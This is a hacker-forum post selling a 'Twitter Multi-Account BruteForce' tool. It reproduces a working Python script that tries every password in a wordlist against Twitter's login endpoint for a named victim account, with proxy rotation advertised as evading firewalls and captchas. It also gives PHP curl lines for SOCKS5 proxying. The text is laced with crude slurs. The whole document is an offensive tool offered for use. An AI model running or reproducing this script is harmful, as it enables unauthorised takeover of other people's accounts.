TWITTER MULTI-ACCOUNT BRUTEFORCE MULTITHREAD PRIV8 BY MAURITANINA ATTACKER







Twitter Multi-Account BruteForce MULTITHREAD Priv8 By Mauritania Attacker Coded in 2 Languages :
1/ PHP script can support Many Users and if you wanna add Dynamic Proxy such as Socks v5 "IP:PORT" you can do brute force more better
and you will not be banned by the firewall or captcha codes , so i'm talking now with coders they will understand this clearly , but the php script can brute force without problem and you are not obliged to use a proxy ;) because i already bypassed the security.
*For Coders: so you gonna just add two lines in the curl function inside your code wich are :
curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050");
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
2/ Python Script can brute force only one user because it will make the attack slow and as you know , Python did not fixed Curl Function in python wich is called "pycurl".I also added verbose mode + Proxy in the script to make more better.
PHP CODE :
PYTHON CODE :
#Changing Description won't make you the coder Lammerz ;)#
#####################################
#Twitter Pentester  2014 Priv888888 #
#Coded By Mauritania Attacker       #
#This tool is for sale              #
#Verbose Mode added + Proxy Nyggaz  #
#####################################
import urllib2, sys, re, urllib, httplib, socket
print "\n################################"
print "#Twitter Pentester  2014 Priv8 #"
print "#Coded By Mauritania Attacker  #"
print "#Verbose Method + Intrusion    #"
print "#AutoRotating Proxy            #"
print "#Undetectable By Firewall      #"
print "################################"
if len(sys.argv) not in [3,4,5,6]:
   print "Usage: twitter.py victim@gmail.com \n"
   print "\t -p : : Undetectable Proxy Mode 100%"
   print "\t -v : Verbose Magic Mode  \n"
   sys.exit(1)
for arg in sys.argv[1:]:
   if arg.lower() == "-p" or arg.lower() == "-proxy":
      proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
   if arg.lower() == "-v" or arg.lower() == "-verbose":
      verbose = 1
try:
   if proxy:
      print "\n[+] Checking the Proxy Nygga :v Wait..."
      h2 = httplib.HTTPConnection(proxy)
      h2.connect()
      print "[+] Proxy:",proxy
except(socket.timeout):
   print "\n[-] Proxy Timed Out"
   proxy = 0
   pass
except(NameError):
   print "\n[-] Proxy Not Given"
   proxy = 0
   pass
except:
   print "\n[-] Proxy Failed"
   proxy = 0
   pass
try:
   if verbose == 1:
      print "[+] Verbose Mode On\n"
except(NameError):
   print "[-] Verbose Mode Off\n"
   verbose = 0
   pass
host = "https://twitter.com/intent/session/"
print "[+] Attacking with Intelligent Method :",host
print "[+] Victim:",sys.argv[1]
try:
     words = open(sys.argv[2], "r").readlines()
     print "[+] Words Loaded:",len(words),"\n"
except(IOError):
     print "[-] Error: Check your wordlist path\n"
     sys.exit(1)
for word in words:
   word = word.replace("\r","").replace("\n","")
   login_form_seq = [
   ('session[username_or_email]', sys.argv[1]),
   ('session[password]', word),
   ('remember_me', 'Remember+me'),
   ('commit', 'Sign+in')]
   login_form_data = urllib.urlencode(login_form_seq)
   if proxy != 0:
      proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
      opener = urllib2.build_opener(proxy_handler)
   else:
      opener = urllib2.build_opener()
   try:
      opener.addheaders = [('User-agent', 'Chrome/34.0.1847.116')]
      site = opener.open(host, login_form_data).read()
   except(urllib2.URLError), msg:
      print msg
      site = ""
      pass
   if re.search("Please re-enter your Twitter account details and try again.",site) == None:
      print "\n\t[!] Twitter Account Cracked Successfully ^_^ :",sys.argv[1],word,"\n"
      sys.exit(1)
   else:
      if verbose == 1:
         print "[-] Login Failed:",word
print "\n[-] Cracking Done Dear ^_^ \!/ Mauritania Attacker \!/ \n"
Mauritania Attacker
www.meethackers.in